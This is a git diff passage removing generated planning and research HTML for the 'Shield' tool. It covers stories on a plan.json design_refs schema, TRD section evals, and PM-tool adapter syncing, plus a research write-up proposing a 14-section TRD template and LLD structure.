  • -
-
-

EPIC-2 · Story schema and design traceability · M1

-

EPIC-2-S1 · Extend plan.json schema with optional design_refs[] · priority: high

-

Add an optional design_refs[] array to each story in the plan.json sidecar. Shape: {doc, component?, section_id, anchor_url, label}. Bump sidecar schema to 1.2; preserve back-compat (missing field is ignored).

-

Tasks

-
    -
  • Edit shield/skills/general/plan-docs/sidecar-schema.md to add design_refs[] field on the story record with the field shape above.
  • -
  • Bump version key in the schema example from '1.1' to '1.2'.
  • -
  • Document back-compat: 1.1/1.0 sidecars without design_refs[] remain valid.
  • -
  • Add a 'design_refs[] field' subsection explaining the per-field semantics (doc ∈ {trd, lld, prd}; component for LLD scoping; anchor_url stable across heading renames).
  • -
-

Acceptance criteria

-
    -
  • shield/skills/general/plan-docs/sidecar-schema.md documents design_refs[] with version 1.2.
  • -
  • A plan.json with no design_refs[] still validates as 1.2.
  • -
  • A plan.json with design_refs[] populated validates as 1.2.
  • -
-

EPIC-2-S2 · Populate design_refs[] when /plan has TRD context · priority: high

-

When /plan generates stories, populate each story's design_refs[] with a forward link to the TRD section it implements. lld refs are emitted as TODO entries until /lld lands.

-

Tasks

-
    -
  • Update plan-docs/SKILL.md generation prompt: for each story, identify which TRD §7 (HLD), §10 (Milestones), or §11 (APIs Involved) section the story implements, and emit a design_refs entry pointing at trd.md#{section-id}.
  • -
  • For LLD references, emit placeholder entries with doc='lld', component=null, anchor_url=null, label='TODO: link when /lld <component> lands'.
  • -
  • Document the heuristic for picking section_id (story title keyword → TRD section anchor).
  • -
-

Acceptance criteria

-
    -
  • A /plan run on a feature with a trd.md emits at least one design_refs entry per story pointing at a real trd.md anchor.
  • -
  • Each story has at least one TRD design_ref; LLD refs are emitted as TODO placeholders.
  • -
  • Re-running /plan does not duplicate entries; existing entries are preserved or updated in place.
  • -
-
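One way to satisfy the "no duplicates on re-run" criterion is to key each entry and merge in place. The sketch below is illustrative only: the helper names, the merge key `(doc, component, section_id)`, and the `section_id: None` value on the LLD placeholder are assumptions, since the plan does not specify them. The placeholder's other values mirror the task text.

```python
def trd_ref(section_id: str, label: str) -> dict:
    """Forward link from a story to a TRD section anchor."""
    return {
        "doc": "trd",
        "section_id": section_id,
        "anchor_url": f"trd.md#{section_id}",
        "label": label,
    }


def lld_placeholder() -> dict:
    """Placeholder used until /lld exists."""
    return {
        "doc": "lld",
        "component": None,
        "section_id": None,  # assumption: not specified for placeholders
        "anchor_url": None,
        "label": "TODO: link when /lld <component> lands",
    }


def _key(ref: dict) -> tuple:
    # Hypothetical merge key; chosen so a relabelled ref updates in place.
    return (ref["doc"], ref.get("component"), ref.get("section_id"))


def upsert_refs(existing: list[dict], new: list[dict]) -> list[dict]:
    """Merge new refs into existing ones without creating duplicates."""
    merged = {_key(r): r for r in existing}
    for r in new:
        merged[_key(r)] = r  # same key: replace in place, keeping position
    return list(merged.values())
```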
-

EPIC-2-S3 · Add JSON Schema validator for plan.json · priority: high

-

Shipping two version bumps (1.1 → 1.2 → 1.3) without a machine-readable validator is where schema drift begins. Add a pydantic/jsonschema validator now, invoked by /plan-review and the eval runner. New per Backend P1-7.

-

Tasks

-
    -
  • Create shield/scripts/validate_plan.py using pydantic (preferred — already in deps via clickup adapter) or jsonschema.
  • -
  • Schema definition lives at shield/schema/plan-sidecar.schema.json (machine-readable counterpart to sidecar-schema.md).
  • -
  • Validator is invoked by /plan-review (first check, before rubric) and the eval runner (in EPIC-3-S3 CI workflow).
  • -
  • Reject unknown doc enum values, enforce design_refs[] cardinality (min 1 per story when populated), reject sidecar versions newer than current.
  • -
-

Acceptance criteria

-
    -
  • uv run shield/scripts/validate_plan.py <path> exits 0 on valid sidecars and non-zero with a named error on invalid ones.
  • -
  • /plan-review invokes the validator before applying rubric checks and aborts on schema failure.
  • -
  • Sidecar version forward-compat behavior matches the policy in sidecar-schema.md.
  • -
-
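The three rejection rules in the tasks can be illustrated with plain Python checks. This is a dependency-free stand-in, not the pydantic or jsonschema validator the story calls for. The top-level `stories` key, the story `id` field, and the error-code strings are hypothetical, because the sidecar layout is not shown here.

```python
CURRENT_VERSION = (1, 2)  # sidecar schema version after the M1 bump
ALLOWED_DOCS = {"trd", "lld", "prd"}


class SidecarError(ValueError):
    """Named validation failure; the message starts with a stable error code."""


def _parse_version(raw: str) -> tuple[int, ...]:
    return tuple(int(part) for part in raw.split("."))


def validate_sidecar(plan: dict) -> None:
    """Raise SidecarError on the first violation; return None when valid."""
    if _parse_version(plan["version"]) > CURRENT_VERSION:
        raise SidecarError(f"version_too_new: {plan['version']}")
    # Assumption: stories sit under a top-level "stories" key.
    for story in plan.get("stories", []):
        if "design_refs" not in story:
            continue  # back-compat: the field is optional
        refs = story["design_refs"]
        if len(refs) < 1:
            raise SidecarError(f"empty_design_refs: {story['id']}")
        for ref in refs:
            if ref.get("doc") not in ALLOWED_DOCS:
                raise SidecarError(f"unknown_doc: {ref.get('doc')!r} in {story['id']}")
```

A command-line wrapper would presumably map a raised `SidecarError` to a non-zero exit code and print the message, which is what the first acceptance criterion asks for.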
-

EPIC-3 · Eval coverage for TRD format · M1

-

EPIC-3-S1 · Author positive TRD eval fixtures (backend + infra) · priority: high

-

Create two positive fixture trd.md files: one for a backend feature (full 14 sections populated with realistic content), one for an infra feature (full 14 sections with realistic content where infra interpretation applies; at least one section uses n/a — <reason> to exercise the escape pattern). The positive eval asserts: all 14 anchors present, each section non-empty OR carrying a valid n/a — <reason> line, slug allow-list matches.

-

Tasks

-
    -
  • Author shield/evals/plan-trd/fixtures/positive-backend/trd.md with all 14 sections (use Bytebite-style fictional feature so content is realistic).
  • -
  • Author shield/evals/plan-trd/fixtures/positive-infra/trd.md with all 14 sections (use a fictional terraform/atmos change — e.g., new VPC module, new Aurora cluster — so content is realistic). At least one section must use n/a — <reason> (e.g., §4 Product Journey marked n/a — declarative state change, no runtime path).
  • -
  • Author the corresponding plan.json sidecars with design_refs[] entries pointing at the fixture trd.md anchors.
  • -
  • Write shield/evals/plan-trd.yaml with both positive cases wired.
  • -
-

Acceptance criteria

-
    -
  • shield/evals/plan-trd/fixtures/positive-backend/trd.md contains all 14 sections with explicit {#section-id} anchors.
  • -
  • shield/evals/plan-trd/fixtures/positive-infra/trd.md contains all 14 sections with explicit {#section-id} anchors and uses n/a — <reason> on at least one section.
  • -
  • Running the eval on both positive fixtures passes (exit code 0).
  • -
  • The fixtures are self-contained: no external API calls, no LLM dispatches.
  • -
-

EPIC-3-S2 · Author missing-section + drift + vague-TBD negative fixtures · priority: high

-

For each of the 14 required sections, author a fixture trd.md that omits that section. Add one drift-by-addition fixture (unprompted 15th section). Add one vague-TBD fixture (section present but contents are 'TBD' instead of either real content or n/a — <reason>). The eval must fail on each with a named, distinguishable error.

-

Tasks

-
    -
  • For each section in the slug allow-list (14 entries), derive a positive fixture and remove only that section to create a negative fixture under shield/evals/plan-trd/fixtures/missing-{section-id}/trd.md.
  • -
  • Wire each negative fixture into shield/evals/plan-trd.yaml with expected_error including the missing section's slug.
  • -
  • Add one drift-by-addition negative fixture under shield/evals/plan-trd/fixtures/extra-section/: add an unprompted 15th section; eval fails with 'unexpected section'.
  • -
  • Add one vague-TBD negative fixture under shield/evals/plan-trd/fixtures/vague-tbd/: §6 Non-Functional Requirements contains only 'TBD' (no real content, no n/a — <reason>); eval fails with 'vague section content'.
  • -
-

Acceptance criteria

-
    -
  • 14 missing-section negative fixtures exist, one per required section.
  • -
  • Running the eval on each missing-section fixture fails with an error naming the missing section's slug.
  • -
  • The drift-by-addition fixture fails with an 'unexpected section' error.
  • -
  • The vague-TBD fixture fails with a 'vague section content' error (distinguishable from missing-section).
  • -
-

EPIC-3-S3 · Wire eval into CI / RED-GREEN paper trail · priority: high

-

Run the eval before and after the /plan command changes land to produce the RED→GREEN paper trail required by CLAUDE.md. Capture both runs in the implementation PR description.

-

Tasks

-
    -
  • Before any /plan command changes: run the eval and confirm RED (positive fixture missing trd.md → expected fail).
  • -
  • After /plan changes land: run the eval and confirm GREEN (3 positive fixtures pass; all 16 negatives — 14 missing-section + 1 drift + 1 vague-TBD — fail with the right named errors).
  • -
  • Capture both run outputs in the PR description.
  • -
-

Acceptance criteria

-
    -
  • PR body contains a 'RED' section showing the eval failing before the changes.
  • -
  • PR body contains a 'GREEN' section showing the eval passing 3 positives + failing all 16 negatives with named errors after the changes.
  • -
  • The eval is invocable via uv run shield/evals/run.py plan-trd (or equivalent existing eval runner).
  • -
-
-

EPIC-4 · /plan-review and /pm-sync wiring · M2

-

EPIC-4-S0 · Scaffold Jira / Confluence / Notion adapter packages · priority: high

-

Only shield/adapters/clickup/ exists today as a uv package. EPIC-4-S3 implies four adapters land in one story but three have no pyproject.toml, no tests/, no MCP server skeleton. Scaffold them first. New per Backend P0-3 (repo-grounded — verified).

-

Tasks

-
    -
  • Create shield/adapters/jira/ with pyproject.toml, server/ skeleton, tests/ with placeholder contract test, .mcp.json entry.
  • -
  • Same for shield/adapters/confluence/.
  • -
  • Same for shield/adapters/notion/.
  • -
  • Create shield/adapters/_common/design_refs.py exposing DesignRef, ForwardResult, ForwardError, and the forward_design_refs protocol interface.
  • -
  • Update top-level workspace pyproject if needed.
  • -
-

Acceptance criteria

-
    -
  • Each new adapter directory has a working pyproject.toml resolvable by uv sync.
  • -
  • Each new adapter has a placeholder contract test runnable under uv run pytest shield/adapters/<tool>/tests/.
  • -
  • shield/adapters/_common/design_refs.py exports the named types and protocol.
  • -
  • .mcp.json entries for new adapters are present (even if disabled until EPIC-4-S3).
  • -
-

EPIC-4-S1 · Add 14-section presence rule + stale-anchor rule to /plan-review · priority: high

-

Extend the /plan-review rubric to check that trd.md contains all 14 required sections with the canonical slug anchors. Sections containing n/a — <reason> pass; sections containing only 'TBD' or empty content fail. Report missing or vague sections as Critical severity.

-

Tasks

-
    -
  • Edit shield/skills/general/plan-review/SKILL.md to add a 'TRD section presence' rule that imports the slug allow-list (14 entries) and checks each anchor exists in trd.md.
  • -
  • Add a 'TRD section content' rule that, for each section, accepts either real content or an n/a — <reason> line; flags 'TBD'/empty.
  • -
  • Add corresponding eval fixtures under shield/evals/plan-review-trd/ exercising both rules (positive + missing-section + vague-TBD + n/a-without-reason).
  • -
-

Acceptance criteria

-
    -
  • /plan-review on a feature folder with a TRD missing any required section reports that section by slug as a Critical finding.
  • -
  • /plan-review on a feature folder with all 14 sections present (including any n/a — <reason> escapes) does not flag section presence or content.
  • -
  • /plan-review on a TRD with a section containing only 'TBD' flags it as a vague-content Critical finding.
  • -
  • /plan-review on a TRD with a section containing 'n/a' (no reason) flags it as a missing-reason finding.
  • -
-
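The content rule distinguishes four outcomes, which a small classifier makes concrete. The sketch below assumes the escape is written as "n/a", then an em dash or hyphen, then a reason, and that a section body has already been extracted as a string. The function name and the returned labels are hypothetical.

```python
import re

# "\u2014" is the em dash used by the escape pattern; a plain hyphen is also accepted.
NA_BARE = re.compile(r"^n/a\s*[\u2014-]?\s*$", re.IGNORECASE)
VAGUE = re.compile(r"^tbd\.?$", re.IGNORECASE)


def classify_section(body: str) -> str:
    """Return 'ok', 'empty', 'vague', or 'missing-reason' for one section body."""
    text = body.strip()
    if not text:
        return "empty"
    if VAGUE.match(text):
        return "vague"
    if NA_BARE.match(text):
        return "missing-reason"  # "n/a" with nothing after it
    # Either an n/a line that carries a reason, or real content.
    return "ok"
```

Under the acceptance criteria above, `empty` and `vague` would map to Critical findings, and `missing-reason` to the missing-reason finding.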

EPIC-4-S2 · Add PRD↔TRD duplication-detection rule to /plan-review · priority: medium

-

Detect when a TRD section verbatim-restates content from the linked PRD. Use a substring-overlap heuristic on §2 Problem Statement and §5 Functional Requirements.

-

Tasks

-
    -
  • Add a 'TRD restates PRD' rule to /plan-review that compares trd.md §2 + §5 against the linked prd.md.
  • -
  • Define the substring-overlap threshold (e.g., flag if > 80 characters of consecutive verbatim overlap).
  • -
-

Acceptance criteria

-
    -
  • A fixture pair where trd.md §2 copies prd.md problem section verbatim produces a duplication finding.
  • -
  • A fixture pair where trd.md §2 paraphrases or summarizes the PRD problem section does not produce a finding.
  • -
- -
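The substring-overlap heuristic can be approximated with the standard library's `difflib`. This is a sketch, not the rule's final form: the 80-character threshold is the example value from the task, and the function names are made up for illustration.

```python
from difflib import SequenceMatcher

OVERLAP_THRESHOLD = 80  # characters; the plan gives this as an example value


def longest_verbatim_overlap(trd_text: str, prd_text: str) -> str:
    """Longest run of characters that appears verbatim in both texts."""
    # autojunk=False stops difflib from discarding frequent characters in long inputs.
    matcher = SequenceMatcher(None, trd_text, prd_text, autojunk=False)
    m = matcher.find_longest_match(0, len(trd_text), 0, len(prd_text))
    return trd_text[m.a : m.a + m.size]


def restates_prd(trd_text: str, prd_text: str) -> bool:
    """True when the longest shared run exceeds the threshold."""
    return len(longest_verbatim_overlap(trd_text, prd_text)) > OVERLAP_THRESHOLD
```

A paraphrase shares only short runs with its source, so it stays under the threshold, which matches the second acceptance criterion. Whitespace normalization before comparison is left out here and may be worth adding.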

EPIC-4-S3 · /pm-sync emits design_refs[] as web links with idempotent upsert

Update /pm-sync adapters (ClickUp + Jira/Confluence/Notion from EPIC-4-S0) to forward each story's design_refs[] entries as web links on the synced task with a deterministic idempotency key. Adapter interface contract locked across all four; observability structured; tool/access requirements documented. Per Backend P0-1, P0-3, P0-4 + DX P1-3 + Backend P1-8 + DX P1-13.

-

Adapter file paths (P1-3)

-
    -
  • shield/adapters/clickup/server/tools/sync.py — extend existing
  • -
  • shield/adapters/jira/server/tools/sync.py — new (per EPIC-4-S0)
  • -
  • shield/adapters/confluence/server/tools/sync.py — new
  • -
  • shield/adapters/notion/server/tools/sync.py — new
  • -
-

Adapter interface contract (P0-3)

-

Each adapter exposes:

-
def forward_design_refs(task_id: str, refs: list[DesignRef]) -> ForwardResult: ...
-
-

where ForwardResult = {created: int, skipped: int, errors: list[ForwardError]}. Both DesignRef and ForwardResult are defined in shield/adapters/_common/design_refs.py (from EPIC-4-S0).

-

Idempotency key: each DesignRef produces idempotency_key = sha256(story_id + anchor_url)[:32]. Adapters use this as:

-
    -
  • Jira: globalId on remote_issue_link
  • -
  • Confluence: name on remote_link
  • -
  • ClickUp: comparison key for URL custom-field dedup before write
  • -
  • Notion: comparison key for URL property dedup before write
  • -
-
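The key derivation and the dedup-before-write behaviour can be shown together. In this sketch the hex digest is an assumption (the plan only says `sha256(...)[:32]`), and `FakeRemote` is a hypothetical in-memory stand-in for a PM tool, not any adapter's real client.

```python
import hashlib
from dataclasses import dataclass, field


def idempotency_key(story_id: str, anchor_url: str) -> str:
    """sha256(story_id + anchor_url), truncated to 32 characters (hex digest assumed)."""
    digest = hashlib.sha256((story_id + anchor_url).encode("utf-8")).hexdigest()
    return digest[:32]


@dataclass
class FakeRemote:
    """Stand-in for a PM tool: remembers which keys already have a link."""

    links: dict[str, str] = field(default_factory=dict)

    def forward(self, story_id: str, anchor_urls: list[str]) -> dict[str, int]:
        created = skipped = 0
        for url in anchor_urls:
            key = idempotency_key(story_id, url)
            if key in self.links:
                skipped += 1  # already linked on an earlier run
            else:
                self.links[key] = url
                created += 1
        return {"created": created, "skipped": skipped}
```

Calling `forward` twice with the same input creates links only on the first call. LLD placeholders carry `anchor_url: null`, so a real adapter would presumably filter them out before computing a key.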

Observability (P1-8): one action_log entry per ref with action='forward_design_ref', fields {story_id, adapter, anchor_url, outcome, idempotency_key}. Failures emit action='forward_design_ref_failed' with {error_class, http_status, idempotency_key}.

-

Tool & access requirements (P1-13):

-
    -
  • Integration tests use HTTP mocking via responses (preferred, credential-free CI) OR free-tier sandbox tenants when run live.
  • -
  • Live credentials come from SHIELD_<ADAPTER>_TOKEN env vars; CI defaults to mocked mode.
  • -
  • Python deps: Jira → requests; Confluence → requests; ClickUp → existing httpx; Notion → requests. All declared per-adapter.
  • -
-

Tasks

-
    -
  • Edit shield/commands/pm-sync.md to describe the forwarding contract, idempotency key, and per-adapter affordances.
  • -
  • Implement forward_design_refs in each of the four adapter files above.
  • -
  • Adapters with no link affordance log 'design_refs forwarding skipped — adapter does not support web links' instead of failing.
  • -
  • Adapter eval fixtures using responses / respx HTTP mocking.
  • -
  • (P0-4) Per-adapter idempotency test under shield/adapters/<tool>/tests/test_idempotency.py: run forward_design_refs twice with the same input against a mocked remote; assert second call produces 0 created and N skipped.
  • -
-

Acceptance criteria

-
    -
  • Running /pm-sync against each of {Confluence, Jira, ClickUp, Notion} forwards design_refs[] URLs on the synced task.
  • -
  • Running /pm-sync with empty design_refs[] succeeds with no side effect.
  • -
  • Adapter fixtures pass in shield/evals/.
  • -
  • (P0-4) Running /pm-sync twice on the same plan produces no duplicates — verified by per-adapter idempotency test.
  • -
  • (P0-3) All four adapters implement the same forward_design_refs(task_id, refs) → ForwardResult signature from _common/design_refs.py.
  • -
  • (P1-8) action_log entries emitted per ref with the documented fields.
  • -
-
-

EPIC-5 · Drift + duplication hardening · M3

-

EPIC-5-S1 · Add last_aligned_with metadata to plan.json · priority: medium

-

Add a top-level last_aligned_with field on plan.json that records the commit SHA of the most recent /implement run that closed a story. Countermeasure for undead-doc drift.

-

Tasks

-
    -
  • Bump plan.json schema to 1.3 to include last_aligned_with: string | null.
  • -
  • Update /implement to write last_aligned_with = HEAD-sha after a story status flips to 'done'.
  • -
  • Document semantics in sidecar-schema.md: null until first /implement run; updated on every subsequent story close.
  • -
-

Acceptance criteria

-
    -
  • Fresh plan.json has last_aligned_with: null.
  • -
  • After /implement closes a story, plan.json has last_aligned_with: <40-char hex sha>.
  • -
  • /pm-sync surfaces the value in the synced epic description.
  • -
-
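The write performed on story close amounts to one validated field update. A minimal sketch, assuming the sidecar is already loaded as a dict; the function name `record_alignment` is hypothetical, and the SHA would typically be obtained from `git rev-parse HEAD`.

```python
import re

SHA_RE = re.compile(r"[0-9a-f]{40}")


def record_alignment(plan: dict, head_sha: str) -> dict:
    """Return a copy of the sidecar with last_aligned_with set to head_sha."""
    if not SHA_RE.fullmatch(head_sha):
        raise ValueError(f"expected a 40-char hex sha, got {head_sha!r}")
    # Copy rather than mutate, so the caller decides when to write to disk.
    return {**plan, "last_aligned_with": head_sha}
```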

EPIC-5-S2 · Add implementation-manual / pseudo-code lint rule to /plan-review · priority: low

-

Detect TRD §7 (HLD) sections that contain code blocks of more than N lines without an Alternatives Considered rationale within the same section — the 'design doc is really an implementation manual' anti-pattern from research.md.

-

Tasks

-
    -
  • Add an 'implementation-manual detection' rule to /plan-review.
  • -
  • Threshold: code block > 20 lines triggers; rule passes if §8 Alternatives Considered is non-empty.
  • -
  • Eval fixture: TRD with 30-line code block and empty §8 → flagged; TRD with 30-line code block and populated §8 → not flagged.
  • -
-

Acceptance criteria

-
    -
  • A TRD with a >20-line code block and an empty §8 produces a finding.
  • -
  • A TRD with a >20-line code block and a populated §8 does not produce a finding.
  • -
  • Threshold is documented in the rule's SKILL.md.
  • -
-
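The lint rule reduces to measuring fenced code blocks in §7 and checking whether §8 has content. The sketch below assumes triple-backtick fences and that both section bodies are passed in as strings. The function names are illustrative, and the 20-line threshold is the one stated in the tasks.

```python
MAX_CODE_LINES = 20  # threshold from the tasks above
FENCE = "`" * 3      # a triple-backtick fence marker


def longest_code_block(markdown: str) -> int:
    """Line count of the longest fenced block, fence lines excluded."""
    longest = current = 0
    inside = False
    for line in markdown.splitlines():
        if line.lstrip().startswith(FENCE):
            if inside:
                longest = max(longest, current)  # closing fence: record length
            inside, current = not inside, 0
        elif inside:
            current += 1
    return longest


def is_implementation_manual(hld_section: str, alternatives_section: str) -> bool:
    """Flag when section 7 has an oversized code block and section 8 is empty."""
    return (
        longest_code_block(hld_section) > MAX_CODE_LINES
        and not alternatives_section.strip()
    )
```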
-

Out of scope (locked)

- - - - - - - - - - - - - - - - - - - - - - - - - -
| Item | Status |
|---|---|
| /lld <component> command | Template locked at 14 sections per PR #43 sample; authoring command is a separate epic. |
| Adapter auto-creation of design-doc pages in Confluence/Notion | v2 enhancement. |
| Structured ClickUp/Notion relationships beyond URL fields | v2 enhancement. |
| Migration tool for existing plan-architecture.md | Direct cutover; files stay readable in old folders. |
-

Next steps

-
    -
  • /plan-review docs/shield/plan-trd-refactor-20260524/plan.json — multi-agent review.
  • -
  • /pm-sync docs/shield/plan-trd-refactor-20260524/plan.json --tool <clickup|jira|notion> — sync to PM tool.
  • -
  • /implement — start with EPIC-3-S1 (positive eval fixture) to anchor the RED → GREEN trail per CLAUDE.md.
  • -
- -
-
Generated by Shield
- -
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/research.html b/docs/shield/plan-trd-refactor-20260524/outputs/research.html
deleted file mode 100644
index 7b673566..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/research.html
+++ /dev/null
@@ -1,837 +0,0 @@
- - - - - -Research — plan-trd-refactor-20260524 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

HLD/LLD Best Practices — Refactor /shield plan to Produce a TRD

-

Status: Proposed
Date: 2026-05-24
Context: Shield's /plan produces a stories-first work-breakdown plus a plan-architecture.md companion. Industry convention is HLD → LLD; Shield is missing the high-level-design layer that justifies the work-breakdown. This research informs a refactor where /plan will emit a TRD = HLD + PM-lens milestones, with a separate LLD authored later per milestone, and stories that reference both HLD and LLD sections.

-

Decision

-

/plan should emit a TRD that combines (a) a high-level design grounded in IEEE 1016 / Sommerville / Pressman section coverage, (b) PM-lens milestones derived from the HLD, (c) a Rollback Strategy section preserving the strongest property of today's plan-architecture.md, and (d) a story breakdown where each story has an additive design_refs array pointing to TRD and LLD sections. The TRD replaces today's plan-architecture.md (direct cutover, no feature flag, no side-by-side period).

-

The TRD applies to both backend and infrastructure work — same 14-section template, same anchor IDs, same eval, same /plan-review rubric. A few sections (Product Journey, Functional Requirements, APIs Involved) have domain-aware interpretation in the /plan prompt; pure-state changes can declare n/a — <reason> per section as the explicit escape (a pattern borrowed from the LLD sample's §12). Two genuinely-infra-favored properties of today's ADR-flavored plan-architecture.md are preserved in the unified template:

  • §8 Alternatives Considered — where the "5 numbered decisions with trade-offs" pattern lives (VPC peering vs Transit Gateway, Aurora vs RDS, single vs multi-region).
  • §14 Rollback Strategy — promoted to a first-class 14th section (terraform destroy plans, state recovery, blue/green flip back, traffic shift reversal for infra; data rollback, feature-flag toggle, key rotation, schema reversal for backend).

LLDs are component-scoped, not milestone-scoped. Each LLD document covers one C4-style Container or Component (a service, library, or module). A single LLD can be referenced by multiple milestones — milestone M1 and milestone M2 may both touch lld-component-auth.md, each updating different sections. The TRD §10 (Milestones) lists which LLDs each milestone touches; the LLDs themselves grow incrementally as milestones land. LLDs are typically authored for backend components where pre-implementation design has measurable value; infra plans rarely need an LLD layer since the declarative terraform/k8s code is the spec.

-

The recommended TRD template, reconciled across the reference TRD template and the industry consensus core, is:

  1. Document Overview — title, status, authors, related PRD link, date
  2. Problem Statement — what user/business/operational problem (links PRD; doesn't restate it)
  3. Objective & Scope — goals, non-goals (Google design-doc convention)
  4. Product Journey — end-to-end user flow (backend) / request lifecycle through the infra or operator journey (infra). n/a — <reason> permitted for pure-state changes.
  5. Functional Requirements — what users can do (backend) / what the infra must support — capacity, regions, accounts, traffic patterns (infra). Links PRD where possible.
  6. Non-Functional Requirements — SLAs, perf, security, observability (backend) / SLOs, RPO/RTO, cost ceiling, blast radius, multi-AZ tolerance (infra). Uber RFC convention.
  7. High-Level Design — services + data flow (backend) / network topology + resource graph + dependency chain (infra). Block/sequence/architecture diagrams.
  8. Alternatives Considered — what we didn't pick and why. For infra plans, this is where the ADR-style "5 numbered decisions with trade-offs" pattern lives — VPC peering vs Transit Gateway, Aurora vs RDS, single vs multi-region. Google + Larson convention.
  9. Cross-Cutting Concerns — security, privacy, observability, multi-tenancy (backend) / IAM, encryption, observability, cost, multi-region, disaster recovery, compliance-region constraints (infra). Google + Uber.
  10. Milestones — PM-lens phased breakdown derived from the HLD (backend) / phased rollout — dev → stage → prod, canary regions, blue/green flip, percentage cutover (infra). Reference TRD precedent.
  11. APIs Involved — HTTP contracts touched (backend) / module interfaces + cloud-API surface + IAM boundaries + output values consumed by downstream stacks (infra).
  12. Open Questions — known unknowns; surfaced for follow-up
  13. References — links to PRD, LLDs (forward links, populated as LLDs land), ADRs, runbooks
  14. Rollback Strategy — data rollback, feature-flag toggle, key rotation, schema reversal (backend) / terraform destroy plan, state recovery, blue/green flip back, traffic shift reversal (infra). Promoted from today's plan-architecture.md Rollback section.

Each milestone in §10 declares which LLDs it touches. The LLDs are authored separately (a future /lld <component> command) and follow the C4 model's Container/Component levels — one LLD per service, library, or module. Stories in plan.json get an optional design_refs[] field with {doc, section_id, anchor_url, label} — additive, backward-compatible with /pm-sync.

-

n/a — <reason> escape per section. Following the LLD sample's §12 pattern, any of the 14 sections may declare n/a — <reason> when the section genuinely doesn't apply (e.g., §4 Product Journey on a pure-state infra change). Vague TBDs and silent omissions are not allowed — the eval rejects them — but an explicit "n/a" with rationale passes. This keeps the structure intact across domains without forcing pretend-content.
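A minimal sketch of how the eval could enforce this rule, assuming the TRD is Markdown whose headings carry explicit `{#slug}` anchors. Only `high-level-design` appears as a slug in this research; the other 13 slugs, the error-code strings, and the function names below are illustrative assumptions, not the shipped eval.

```python
import re

# Only "high-level-design" is confirmed by the research; the rest are assumed slugs.
CANONICAL_SLUGS = [
    "document-overview", "problem-statement", "objective-and-scope",
    "product-journey", "functional-requirements", "non-functional-requirements",
    "high-level-design", "alternatives-considered", "cross-cutting-concerns",
    "milestones", "apis-involved", "open-questions", "references",
    "rollback-strategy",
]

HEADING = re.compile(r"^#{1,6}\s+.*\{#([a-z0-9-]+)\}\s*$")
NA_ESCAPE = re.compile(r"n/a\s+—\s+\S", re.IGNORECASE)   # "n/a — <reason>"
VAGUE = re.compile(r"^(tbd|todo|tba)\W*$", re.IGNORECASE)


def split_sections(markdown: str) -> dict[str, str]:
    """Map each tagged heading's slug to the text that follows it."""
    sections, slug = {}, None
    for line in markdown.splitlines():
        match = HEADING.match(line)
        if match:
            slug = match.group(1)
            sections[slug] = []
        elif slug is not None:
            sections[slug].append(line)
    return {k: "\n".join(v).strip() for k, v in sections.items()}


def validate_trd(markdown: str) -> list[str]:
    """Return named errors: missing, empty/vague, bare n/a, or unexpected sections."""
    sections = split_sections(markdown)
    errors = []
    for slug in CANONICAL_SLUGS:
        body = sections.get(slug)
        if body is None:
            errors.append(f"missing-section:{slug}")
        elif not body or VAGUE.match(body):
            errors.append(f"empty-section:{slug}")
        elif body.lower().startswith("n/a") and not NA_ESCAPE.match(body):
            errors.append(f"na-without-reason:{slug}")
    for slug in sections:
        if slug not in CANONICAL_SLUGS:
            errors.append(f"unexpected-section:{slug}")
    return errors
```

Checking for unexpected slugs as well as missing ones covers drift in both directions, so a run that invents a fifteenth section fails just as a run that drops one does.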

-

Canonical LLD template (14 sections — from sample PR #43)

-

The LLD template is anchored in tesseract PR #43 (docs/superpowers/specs/2026-05-18-lld-sample.html), a Bytebite user-signup sample that establishes the LLD shape Shield should generate:

| # | Section | Always-on? | Notes |
|---|---|---|---|
| 1 | Overview | Yes | Names which epics/PRD milestones this LLD serves — bidirectional with TRD §10 |
| 2 | Scope & non-goals | Yes | In-scope/out-of-scope lists |
| 3 | Module layout | Yes | File tree with new/mod/unchanged badges |
| 4 | Data model | Yes | Tables + Redis/cache namespaces with column-level detail |
| 5 | API contracts | Yes | Per-endpoint request/response (each endpoint gets its own sub-anchor, e.g., #api-create-user) |
| 6 | Sequence flows | Yes | Mermaid sequence diagrams (each flow gets its own sub-anchor, e.g., #flow-signup) |
| 7 | Error handling | Yes | Error codes + behavior matrix |
| 8 | Concurrency & state | Yes | Named race conditions and resolutions |
| 9 | Configuration | Promote-on-demand | Config values; lifted when the component needs them |
| 10 | Observability | Yes | Logs, metrics, traces |
| 11 | Security & privacy | Promote-on-demand | Auth, PII, threats; lifted when the component touches user data |
| 12 | Performance & scaling | Yes — 8 forced subsections | 12.1 Load · 12.2 SLO · 12.3 Bottleneck · 12.4 Latency breakdown · 12.5 Capacity · 12.6 Scale-out lever · 12.7 Caches · 12.8 Degradation. "n/a — <reason>" is the only escape; vague prose is not allowed. |
| 13 | Open questions | Yes | Q#, question, options, owner, resolve-by table |
| 14 | Changelog | Yes | Every edit ties to a story ID + sections touched — closes the loop with plan.json design_refs[] |

Header metadata (above §1): Feature · Owner · Status · Linked PRD · Linked plans (plural — one LLD, many plans) · Version · Last updated.

-

Why this shape works for Shield:

  • Per-component scope with Linked plans plural matches the user's "same LLD doc covered across multiple milestones" intent.
  • Stable kebab-case anchors on every section AND subsection — directly addresses Confluence-style anchor-rot the research surfaced.
  • §12's 8 forced subsections are the strongest anti-format-drift mechanism in the template: a fixture-based eval can mechanically check that all 8 are present and non-empty, with "n/a — <reason>" as the only allowed escape.
  • §14 Changelog with story IDs is the inverse of design_refs[] on the story side — the LLD knows which stories touched it; the story knows which LLD sections it depends on. Bidirectional graph.
  • §9 + §11 promote-on-demand acknowledges that not every component touches config or user data — keeps the template scoped to reality without losing the slot.
-
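The bidirectional graph in the list above lends itself to a mechanical consistency check. The sketch below is one possible reading, under assumptions: each LLD's §14 Changelog has already been parsed into rows with a `story_id` and a list of `sections`, and every LLD-side `design_refs[]` entry carries `component` and `section_id`. The function name and the parsed-changelog shape are hypothetical.

```python
def unmatched_links(stories: list[dict], changelogs: dict[str, list[dict]]):
    """Compare story-side design_refs with LLD-side changelog rows.

    `changelogs` maps a component name to its §14 rows; each row is a dict
    with "story_id" and "sections" (a list of section IDs). This shape is
    an assumption made for the sketch.
    """
    from_stories = {
        (story["id"], ref["component"], ref["section_id"])
        for story in stories
        for ref in story.get("design_refs", [])
        if ref.get("doc") == "lld"
    }
    from_lld = {
        (row["story_id"], component, section)
        for component, rows in changelogs.items()
        for row in rows
        for section in row["sections"]
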